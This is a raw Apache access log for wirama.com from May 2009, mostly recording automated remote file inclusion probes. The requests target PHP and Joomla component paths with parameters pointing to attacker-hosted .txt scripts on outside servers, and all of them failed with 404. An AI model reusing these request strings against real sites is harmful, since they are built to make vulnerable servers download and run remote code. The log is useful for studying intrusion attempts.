93.164.123.218 - - [01/May/2009:05:53:46 -0700] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.164.123.218 - - [01/May/2009:05:53:46 -0700] "GET /logs/access_090401.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.164.123.218 - - [01/May/2009:05:53:46 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [01/May/2009:05:59:02 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
83.226.184.228 - - [01/May/2009:05:59:19 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.226.184.228 - - [01/May/2009:05:59:19 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.226.184.228 - - [01/May/2009:05:59:34 -0700] "GET /logs/access_090401.log//components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.226.184.228 - - [01/May/2009:05:59:37 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.226.184.228 - - [01/May/2009:05:59:37 -0700] "GET /logs/access_090401.log//components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
83.226.184.228 - - [01/May/2009:05:59:37 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.164.123.218 - - [01/May/2009:06:00:25 -0700] "GET /logs/access_090301.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.61 - - [01/May/2009:06:02:40 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.61 - - [01/May/2009:06:02:41 -0700] "GET /logs/access_090301.log HTTP/1.1" 200 620059 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
93.164.123.218 - - [01/May/2009:06:10:35 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
93.164.123.218 - - [01/May/2009:06:10:35 -0700] "GET /logs/access_090331.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
75.125.167.2 - - [01/May/2009:06:10:46 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.125.167.2 - - [01/May/2009:06:10:46 -0700] "GET /logs/access_090401.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
75.125.167.2 - - [01/May/2009:06:10:46 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.164.123.218 - - [01/May/2009:06:10:57 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
93.164.123.218 - - [01/May/2009:06:11:41 -0700] "GET /logs/access_090330.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.89.31.105 - - [01/May/2009:06:16:54 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
69.89.31.105 - - [01/May/2009:06:16:54 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "wirama.com"
122.201.76.150 - - [01/May/2009:06:17:49 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:17:49 -0700] "GET /logs/access_090401.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:17:49 -0700] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
67.204.25.53 - - [01/May/2009:06:17:50 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
67.204.25.53 - - [01/May/2009:06:17:50 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
122.201.76.150 - - [01/May/2009:06:19:29 -0700] "GET /logs/access_090301.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
201.28.103.46 - - [01/May/2009:06:20:08 -0700] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.wg.com.pl/downloads/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.wirama.com"
201.28.103.46 - - [01/May/2009:06:20:08 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.wg.com.pl/downloads/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.wirama.com"
93.164.123.218 - - [01/May/2009:06:20:51 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
93.164.123.218 - - [01/May/2009:06:20:51 -0700] "GET /logs/access_090331.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
93.164.123.218 - - [01/May/2009:06:20:51 -0700] "GET /logs/access_090330.log%20%20/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
93.164.123.218 - - [01/May/2009:06:20:52 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:06:21:40 -0700] "GET /logs//errors.php?error=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:06:21:40 -0700] "GET /logs/access.log//errors.php?error=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:06:21:40 -0700] "GET /errors.php?error=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.191.102.117 - - [01/May/2009:06:23:18 -0700] "GET /logs/access.log//errors.php?error=http://www.spaansehonden.info/content/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.191.102.117 - - [01/May/2009:06:23:18 -0700] "GET /errors.php?error=http://www.spaansehonden.info/content/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.191.102.117 - - [01/May/2009:06:23:18 -0700] "GET /logs//errors.php?error=http://www.spaansehonden.info/content/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
74.54.239.74 - - [01/May/2009:06:23:18 -0700] "GET /logs/access.log%20%20//errors.php?error=http://walkersgameear.com/email-bad/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.191.102.117 - - [01/May/2009:06:23:26 -0700] "GET /logs//errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.191.102.117 - - [01/May/2009:06:23:26 -0700] "GET /logs/access.log//errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.191.102.117 - - [01/May/2009:06:24:39 -0700] "GET /logs/access.log%20%20//errors.php?error=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
64.191.102.117 - - [01/May/2009:06:25:12 -0700] "GET /logs/access.log%20%20//errors.php?error=http://www.spaansehonden.info/content/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.158.124.146 - - [01/May/2009:06:25:14 -0700] "GET /errors.php?error=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.158.124.146 - - [01/May/2009:06:25:14 -0700] "GET /logs/errors.php?error=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.158.124.146 - - [01/May/2009:06:25:16 -0700] "GET /logs/access_090401.log/errors.php?error=http://actifit.co.kr/marketing/imgs/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:28:00 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:28:00 -0700] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:28:00 -0700] "GET /logs/access_090401.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:28:42 -0700] "GET /logs/access_090301.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
207.67.117.173 - - [01/May/2009:06:32:12 -0700] "GET / HTTP/1.0" 200 900 "-" "larbin_2.6.3 larbin2.6.3@unspecified.mail" "www.wirama.com"
122.201.76.150 - - [01/May/2009:06:32:28 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:32:33 -0700] "GET /logs/access_090401.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:32:33 -0700] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:33:00 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:33:00 -0700] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:33:00 -0700] "GET /logs/access_090401.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:33:21 -0700] "GET /logs/access_090301.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
88.84.128.40 - - [01/May/2009:06:33:56 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
88.84.128.40 - - [01/May/2009:06:33:56 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "wirama.com"
122.201.76.150 - - [01/May/2009:06:34:00 -0700] "GET /logs/access_090301.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.116.178.20 - - [01/May/2009:06:35:05 -0700] "GET /errors.php?error=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.116.178.20 - - [01/May/2009:06:35:05 -0700] "GET /logs//errors.php?error=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.116.178.20 - - [01/May/2009:06:35:05 -0700] "GET /logs/access.log//errors.php?error=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.116.178.20 - - [01/May/2009:06:35:35 -0700] "GET /errors.php?error=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.116.178.20 - - [01/May/2009:06:35:36 -0700] "GET /logs//errors.php?error=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.116.178.20 - - [01/May/2009:06:35:36 -0700] "GET /logs/access.log//errors.php?error=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
122.201.76.150 - - [01/May/2009:06:37:38 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:37:38 -0700] "GET /logs/access_090401.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:37:38 -0700] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.201.76.150 - - [01/May/2009:06:39:10 -0700] "GET /logs/access_090301.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.221.130.17 - - [01/May/2009:06:39:35 -0700] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:06:39:35 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
77.221.130.17 - - [01/May/2009:06:39:35 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
198.64.129.27 - - [01/May/2009:06:42:42 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/plugins/docman/idr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
198.64.129.27 - - [01/May/2009:06:42:42 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/plugins/docman/idr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
93.164.123.218 - - [01/May/2009:06:44:56 -0700] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.164.123.218 - - [01/May/2009:06:44:57 -0700] "GET /logs/access_090401.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.164.123.218 - - [01/May/2009:06:45:10 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.232.66.198 - - [01/May/2009:06:47:16 -0700] "GET /logs/components/com_extcalendar/admin_events.php=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.232.66.198 - - [01/May/2009:06:47:16 -0700] "GET /logs/access_090401.log/components/com_extcalendar/admin_events.php=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.232.66.198 - - [01/May/2009:06:47:16 -0700] "GET /components/com_extcalendar/admin_events.php=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.232.66.198 - - [01/May/2009:06:47:27 -0700] "GET /components/com_extcalendar/admin_events.php=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.232.66.198 - - [01/May/2009:06:47:27 -0700] "GET /logs/access_090401.log/components/com_extcalendar/admin_events.php=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
77.232.66.198 - - [01/May/2009:06:47:27 -0700] "GET /logs/components/com_extcalendar/admin_events.php=http://www.mykr.net/bbs/data/id/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.116.178.20 - - [01/May/2009:06:52:14 -0700] "GET /logs/access.log%20%20//errors.php?error=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
82.197.36.171 - - [01/May/2009:06:54:56 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/plugins/docman/idr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
82.197.36.171 - - [01/May/2009:06:54:56 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/plugins/docman/idr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
82.197.36.171 - - [01/May/2009:06:55:35 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/plugins/docman/idr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
82.197.36.171 - - [01/May/2009:06:55:35 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.eforel.com/ecommerce/plugins/docman/idr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
93.164.123.218 - - [01/May/2009:07:00:03 -0700] "GET /logs/access_090301.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
122.116.178.20 - - [01/May/2009:07:00:15 -0700] "GET /logs/access.log%20%20//errors.php?error=http://coastaldistribution.com/home/administrator/components/com_jpack/includes/fx29id2.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
88.84.128.40 - - [01/May/2009:07:01:54 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
88.84.128.40 - - [01/May/2009:07:01:54 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
67.204.25.53 - - [01/May/2009:07:08:16 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
67.204.25.53 - - [01/May/2009:07:08:16 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.wirama.com"
93.164.123.218 - - [01/May/2009:07:08:30 -0700] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.164.123.218 - - [01/May/2009:07:08:43 -0700] "GET /logs/access_090331.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
93.164.123.218 - - [01/May/2009:07:08:49 -0700] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.jneart.net/da/data.Old/site/hhs/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
69.89.31.105 - - [01/May/2009:07:10:19 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.wirama.com"
69.89.31.105 - - [01/May/2009:07:10:19 -0700] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.wirama.com"
204.14.106.24 - - [01/May/2009:07:13:10 -0700] "GET /skin/zero_vote/error.php?dir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
204.14.106.24 - - [01/May/2009:07:13:10 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
204.14.106.24 - - [01/May/2009:07:13:10 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
